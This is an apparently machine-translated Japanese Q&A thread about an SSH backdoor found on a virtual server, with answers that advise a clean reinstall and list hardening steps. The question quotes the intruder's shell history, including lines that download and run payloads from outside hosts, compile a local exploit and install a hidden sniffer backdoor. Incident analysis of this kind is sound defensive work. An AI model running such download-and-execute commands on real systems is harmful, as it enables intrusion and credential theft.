VServerでSSHバックドアが見つかりました。何をすべきか?


24

昨日、VServerでコマンドの履歴を確認しました。疑わしい行がいくつか見つかりました。

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

特にsniffer.tgzは私に衝撃を与えました。仮想マシンをセットアップし、このtgzアーカイブをダウンロードしました。セットアップを開始すると、次の行が表示されました。

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

誰もこれを削除する方法を知っていますか?


回答:


66

これは、あなたがこれを持っていたことをすべてのシステムに何をすべきかですsniffer.tgz:上の軌道からハァハァそれらすぐに、そしてクリーンインストールからやり直します。(つまり、システムを破壊し、クリーンに再インストールし、クリーンなバックアップからデータをロードします- クリーンなバックアップがあると仮定し、インターネットに戻す前にシステムを強化します)。

マルウェアがある場合やハッカーがこのようにシステムに侵入するたびに、システムがどのように構成されているかを再分析し、同じ手順を繰り返さないようにします。しかし、これはあなたが取って、法医学的に分析する能力を持っているシステムではないかもしれません、そしてこれがあなたの唯一のサーバーであるかもしれないので、仮想システムを破壊し、最初からやり直す時です(上で言ったように)。

(これは、システムにマルウェアが発生するような状況に当てはまります。このようなものを交換するための予備のハードウェアがない限り、通常ほとんどのユーザーにはない侵害されたシステムを隔離して調査できますが、選択の余地はありませんが、システムを破棄して最初からやり直す)

サーバーを分析せずに、あなたが間違ったことを本当に言うことはできませんが、このバックドアは、インストールされた単なる「プログラム」よりもシステムの奥深くにある可能性があります。そして、悪人はすでにシステムにバックドアをインストールする必要があるため、すべてのパスワードが侵害されて安全ではなくなったと想定できます(SSH、MySQLルート、またはこれまでに存在する他の種類のパスワードのいずれであっても)このコンピューターシステムに入力されました)。すべてのパスワードを変更する時間です!


クリーンな環境に戻ったら、考慮すべき強化手順に関する基本的なヒントを次に示します。これらによりトピックがより広くなるため、ここでは詳細に掘り下げることはできませんが、システムを保護するための強化手順を必ず実行する必要があります。

  1. ファイアウォールをオンにし、かつ専用でオープンする必要があるポートへのアクセスを許可しますufwシンプルに存在するので、それを使用しましょう。 sudo ufw enable。(環境に合わせてufw適切に構成することは別の話であり、この質問の範囲を超えています。)

  2. リモートSSHへのアクセスを制限します。これは常に実行できるとは限りませんが、理想的には、所有しているIPアドレスを特定し、ファイアウォールで具体的にホワイトリストに登録します。(動的IPアドレスを使用している場合は、この手順をスキップしてください)。

  3. サーバーへのSSHアクセスをロックダウン、そして唯一の認証のためにSSH鍵を使用する必要が。このようにして、ハッカーはサーバーを攻撃してパスワードを推測することはできません。適切な秘密キーを推測するのははるかに難しく(すべてをブルートフォースする必要があるため)、これはブルートフォース攻撃からの保護に役立ちます。

  4. あなたがウェブサイトを運営している場合、人々が自由に物事をアップロード/実行できないように、許可をロックダウンしてください。これを行うことはサイトごとに異なるため、ここでこれ以上のガイダンスを提供することはできません(そうすることは不可能です)。

  5. また、JoomlaやWordpressなどを使用してWebサイトを実行している場合は、環境を常に最新の状態に保ち、ソフトウェアプロバイダーからのセキュリティ脆弱性をパッチしてください。

  6. 可能な場合は、で認証するものに対して2要素認証(2FA)メソッドをセットアップ、構成、使用します。さまざまなアプリケーションの二要素認証には多くのソリューションがあり、この方法でさまざまなアプリケーションを保護することはこの投稿の範囲外であるため、ソリューションを選択する前にこの点について調査する必要があります。

  7. セットアップでパスワードを絶対に使用する必要がある場合は、適切なパスワードマネージャーを使用し(クラウドベースのパスワードマネージャーは必ずしも適切な選択肢ではありません)、個々のアイテムごとに異なる長い(25文字以上の)ランダムで記憶できないパスワードを使用しますパスワードで保護されています(パスワードマネージャーの推奨事項です)。(ただし、可能な場合はパスワードを使用しないこと(SSH認証など)を強く検討し、可能な場合は2FAを使用する必要があります。


コメントは詳細なディスカッション用ではありません。この会話はチャットに移動さました
テルドン

これが私がやろうとしていることなので、私は答えを受け入れました。私の個人的な興味のためだけに、VMでバックドアを閉じようとします。
イツカジョ

0

バックドアが1つある場合、さらに3つあります。データの分離、バックアップ、削除、および慎重なデータ復元:cron、php、またはmysqlのデータにも注意してください。これらはすべて侵害される可能性があります。この時点で、彼らはすべてのパスワードとハッシュを持っているので、他のマシンが同様に構成されている場合、それらもおそらくハッキングすることを覚えておいてください... WordPressでプラグイン/テーマなどでマルウェアを探している場合は、アクセス権を確認してください。簡単な答えはありません、あなたは多くの仕事を見ています。


必ずしも複数あるわけではありませんが、ここではそうでない場合が多いか、そうである可能性があります。そして、彼らはすべてのパスワードを確実に持っているわけではありません。また、他のマシンをハッキングした可能性も「ありそう」ではなく、その意図もスニッフィングされたものもわからず、悪いプログラムが存在する以外に起動されたり、何らかの方法で実行された場合でもありません。また、「慎重にデータを復元する」ことは、非常に細心の注意が必要な何かに対する非常に一般的なアドバイスです。
ジェームズ
弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.